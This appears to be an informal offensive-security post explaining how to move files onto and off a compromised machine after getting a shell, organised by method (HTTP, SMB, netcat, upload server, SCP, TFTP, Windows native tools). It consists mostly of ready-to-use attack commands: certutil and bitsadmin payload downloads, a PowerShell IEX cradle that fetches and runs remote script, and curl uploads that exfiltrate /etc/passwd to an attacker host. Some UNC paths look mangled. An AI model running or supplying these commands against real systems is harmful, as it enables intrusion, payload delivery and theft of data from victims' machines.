A pretty overlooked subject imo, but it's definitely relevant and pretty much critical once you're past the foothold stage and now have to trasnfer files onto or from the compromised machine. File transfers on machines you just got a shell on are a connectivity problem. what can this target actually reach, and what does it have available to receive with?

Step 1: figure out what you're working with

Before anything else, check what transfer tools are available on the target. Look for wget, curl, python3, php, perl, ruby, nc, ftp, scp and tftp, whatever's there defines what you work with (duh)

find / -name wget 2>/dev/null

find / -name curl 2>/dev/null

Then figure out what outbound connectivity looks like. Can it reach your machine at all?

so from target, test outbound connectivity

ping -c 1 YOUR_IP

curl http://YOUR_IP:8080

wget http://YOUR_IP:8080

of course set up a quick listener on your attack machine before running these so you can see what actually hits:

python3 -m http.server 8080

tcpdump -i tun0 icmp (to watch for pings)

What comes back tells you everything, HTTP allowed but not ICMP, raw TCP blocked, nothing at all, whatever answer points you to a different method. Anyway, each method:

HTTP:

If the target can reach you over HTTP you're in good shape, serve from your machine, pull from the target.

-On your attack machine:

cd /path/to/files

python3 -m http.server 8080

or

php -S [0.0.0.0: 8080] (incase no python)

-On your target (if Linux)

wget http://YOUR_IP:8080/linpeas.sh -O /tmp/linpeas.sh

or

curl http://YOUR_IP:8080/linpeas.sh -o /tmp/linpeas.sh

chmod +x /tmp/linpeas.sh

-On your target (if windows) you can run:

certutil -urlcache -split -f http://YOUR_IP:8080/file.exe file.exe

or

powershell -c "Invoke-WebRequest http://YOUR_IP:8080/file.exe -OutFile file.exe"

or

powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR_IP:8080/file.exe','file.exe')"

or

bitsadmin /transfer job http://YOUR_IP:8080/file.exe C:\Windows\Temp\file.exe

SMB:

SMB is a solid choice on Windows where it's native and doesn't require downloading anything.

-on the attack machine:

impacket-smbserver share . -smb2support

or

impacket-smbserver share . -smb2support -username user -password pass (in case auth required)

-on the target (if windows)

copy \YOUR_IP\share\file.exe .

or

\YOUR_IP\share\file.exe

or

net use Z: \YOUR_IP\share (if you want to map as drive letter)

-Netcat:

If outbound HTTP is filtered but raw TCP isn't, netcat works in both directions.

-Target machine

nc -lvnp 5555 > linpeas.sh

-attack machine

nc TARGET_IP 5555 < linpeas.sh

(or if you wanna pull from attack machine)

-Attack machine:

nc -lvnp 5555 < linpeas.sh

-Then target

nc YOUR_IP 5555 > linpeas.sh

chmod +x linpeas.sh

Python HTTP server + upload :

Python's http.server only serves files by default. If you need to push files TO your attack machine from the target, you need an upload-capable server.

-Attack machine

pip install uploadserver

python3 -m uploadserver 8080

-Target (push file back to you)

curl -X POST http://YOUR_IP:8080/upload -F files=@/etc/passwd

or

curl -X POST http://YOUR_IP:8080/upload -F [email protected]

useful for exfiltrating files from the target

SCP and SFTP

If you have SSH credentials or a key,

(to push to target)

scp linpeas.sh user@TARGET_IP:/tmp/linpeas.sh

or

scp -i id_rsa linpeas.sh user@TARGET_IP:/tmp/linpeas.sh

(to pull from target externally)

scp user@TARGET_IP:/etc/passwd ./passwd

or

scp -r user@TARGET_IP:/opt/app ./app

TFTP:

On older Linux systems or embedded devices TFTP is sometimes the only thing available.

-Attack machine:

sudo systemctl start tftpd-hpa

or

sudo atftpd --daemon --port 69 /tftp

-Target

tftp YOUR_IP

get linpeas.sh

quit

Windows has a few native options too:

-PowerShell download cradle

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP:8080/script.ps1')

-PowerShell file download

Invoke-WebRequest http://YOUR_IP:8080/file.exe -OutFile C:\Windows\Temp\file.exe

or

powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR_IP:8080/file.exe','file.exe')"

-Living off the land (use existing Windows binaries)

expand \YOUR_IP\share\file.cab C:\Windows\Temp\file.exe

The decision tree in practice: HTTP first, SMB if Windows, netcat if TCP is open, SCP if SSH is available